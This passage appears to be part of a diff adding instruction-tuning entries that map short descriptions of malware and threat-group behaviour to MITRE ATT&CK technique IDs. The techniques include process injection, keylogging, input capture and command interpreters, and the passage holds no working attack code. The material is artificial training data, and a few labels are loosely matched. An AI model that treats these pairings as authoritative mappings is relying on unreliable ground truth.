"A Threat Group-3390 tool can spawn svchost.exe and inject the payload into that process.", + "output": "- T1055.012: Process Injection - Process Hollowing" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "TrickBot injects into the svchost.exe process.", + "output": "- T1055.012: Process Injection - Process Hollowing" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "WhisperGate has the ability to inject its fourth stage into a suspended process created by the legitimate Windows utility `InstallUtil.exe`.", + "output": "- T1055.012: Process Injection - Process Hollowing" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Leafminer has used Process Doppelg\u00e4nging to evade security software while deploying tools on compromised systems.", + "output": "- T1055.013: Process Injection - Process Doppelg\u00e4nging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "SynAck abuses NTFS transactions to launch and conceal malicious processes.", + "output": "- T1055.013: Process Injection - Process Doppelg\u00e4nging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "InvisiMole has used ListPlanting to inject code into a trusted process.", + "output": "- T1055.015: Process Injection - ListPlanting" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT3 has used a keylogging tool that records keystrokes in encrypted files.", + "output": "- T1056.001: Input Capture - Keylogging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT39 has used tools for capturing keystrokes.", + "output": "- T1056.001: Input Capture - Keylogging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Agent Tesla can log keystrokes on the victim\u2019s machine.", + "output": "- T1056.001: Input Capture - Keylogging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"AppleSeed can use \"\"GetKeyState\"\" and \"\"GetKeyboardState\"\" to capture keystrokes on the victim\u2019s machine.\"", + "output": "- T1056.001: Input Capture - Keylogging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Astaroth logs keystrokes from the victim's machine.", + "output": "- T1056.001: Input Capture - Keylogging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "BlackEnergy has run a keylogger plug-in on a victim.", + "output": "- T1056.001: Input Capture - Keylogging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Catchamas collects keystrokes from the victim\u2019s machine.", + "output": "- T1056.001: Input Capture - Keylogging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "FIN4 has captured credentials via fake Outlook Web App (OWA) login pages and has also used a .NET based keylogger.", + "output": "- T1056.001: Input Capture - Keylogging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Grandoreiro can log keystrokes on the victim's machine.", + "output": "- T1056.001: Input Capture - Keylogging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "HTTPBrowser is capable of capturing keystrokes on victims.", + "output": "- T1056.001: Input Capture - Keylogging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "KeyBoy installs a keylogger for intercepting credentials and keystrokes.", + "output": "- T1056.001: Input Capture - Keylogging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Matryoshka is capable of keylogging.", + "output": "- T1056.001: Input Capture - Keylogging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Metamorfo has a command to launch a keylogger and capture keystrokes on the victim\u2019s machine.", + "output": "- T1056.001: Input Capture - Keylogging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "NavRAT logs the keystrokes on the targeted system.", + "output": "- T1056.001: Input Capture - Keylogging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Okrum was seen using a keylogger tool to capture keystrokes.", + "output": "- T1056.001: Input Capture - Keylogging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Peppy can log keystrokes on compromised hosts.", + "output": "- T1056.001: Input Capture - Keylogging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Prikormka contains a keylogger module that collects keystrokes and the titles of foreground windows.", + "output": "- T1056.001: Input Capture - Keylogging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "QakBot can capture keystrokes on a compromised host.", + "output": "- T1056.001: Input Capture - Keylogging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Remexi gathers and exfiltrates keystrokes from the machine.", + "output": "- T1056.001: Input Capture - Keylogging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "SMOKEDHAM can continuously capture keystrokes.", + "output": "- T1056.001: Input Capture - Keylogging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Sykipot contains keylogging functionality to steal passwords.", + "output": "- T1056.001: Input Capture - Keylogging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The executable version of Helminth has a module to log keystrokes.", + "output": "- T1056.001: Input Capture - Keylogging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Threat Group-3390 actors installed a credential logger on Microsoft Exchange servers. Threat Group-3390 also leveraged the reconnaissance framework, ScanBox, to capture keystrokes.", + "output": "- T1056.001: Input Capture - Keylogging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Tonto Team has used keylogging tools in their operations.", + "output": "- T1056.001: Input Capture - Keylogging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "XAgentOSX contains keylogging functionality that will monitor for active application windows and write them to the log, it can handle special characters, and it will buffer by default 50 characters before sending them out over the C2 infrastructure.", + "output": "- T1056.001: Input Capture - Keylogging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "jRAT has the capability to log keystrokes from the victim\u2019s machine, both offline and online.", + "output": "- T1056.001: Input Capture - Keylogging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "menuPass has used key loggers to steal usernames and passwords.", + "output": "- T1056.001: Input Capture - Keylogging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Dok prompts the user for credentials.", + "output": "- T1056.002: Input Capture - GUI Input Capture" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Metamorfo has displayed fake forms on top of banking sites to intercept credentials from victims.", + "output": "- T1056.002: Input Capture - GUI Input Capture" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"XCSSET prompts the user to input credentials using a native macOS dialog box leveraging the system process \"\"/Applications/Safari.app/Contents/MacOS/SafariForWebKitDevelopment\"\".\"", + "output": "- T1056.002: Input Capture - GUI Input Capture" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"TrickBot has the ability to capture RDP credentials by capturing the \"\"CredEnumerateA\"\" API\"", + "output": "- T1056.004: Input Capture - Credential API Hooking" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Zebrocy installs an application-defined Windows hook to get notified when a network drive has been attached, so it can then use the hook to call its RecordToFile file stealing method.", + "output": "- T1056.004: Input Capture - Credential API Hooking" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Kwampirs collects a list of running services with the command \"\"tasklist /v\"\".\"", + "output": "- T1057: Process Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "TeamTNT has searched for rival malware and removes it if found. TeamTNT has also searched for running processes containing the strings aliyun or liyun to identify machines running Alibaba Cloud Security tools.", + "output": "- T1057: Process Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT19 downloaded and launched code within a SCT file.", + "output": "- T1059: Command and Scripting Interpreter" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT28 uses cmd.exe to execute commands and custom backdoors.", + "output": "- T1059: Command and Scripting Interpreter" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT32 has used COM scriptlets to download Cobalt Strike beacons.", + "output": "- T1059: Command and Scripting Interpreter" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT37 has used Ruby scripts to execute payloads.", + "output": "- T1059: Command and Scripting Interpreter" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT39 has utilized AutoIt and custom scripts to perform internal reconnaissance.", + "output": "- T1059: Command and Scripting Interpreter" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Astaroth spawns a CMD process to execute commands.", + "output": "- T1059: Command and Scripting Interpreter\n- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Bonadan can create bind and reverse shells on the infected system.", + "output": "- T1059: Command and Scripting Interpreter" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Cobalt Group has used a JavaScript backdoor that is capable of launching cmd.exe to execute shell commands.", + "output": "- T1059: Command and Scripting Interpreter" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Denis can launch a remote shell to execute arbitrary commands on the victim\u2019s machine.", + "output": "- T1059: Command and Scripting Interpreter\n- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Donut can generate shellcode outputs that execute via Ruby.", + "output": "- T1059: Command and Scripting Interpreter" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Emotet has used cmd.exe to run a PowerShell script.", + "output": "- T1059: Command and Scripting Interpreter\n- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Exaramel for Windows has a command to launch a remote shell and executes commands on the victim\u2019s machine.", + "output": "- T1059: Command and Scripting Interpreter\n- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "FIN6 has used scripting to iterate through a list of compromised PoS systems, copy data to a log file, and remove the original data files.", + "output": "- T1059: Command and Scripting Interpreter" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The 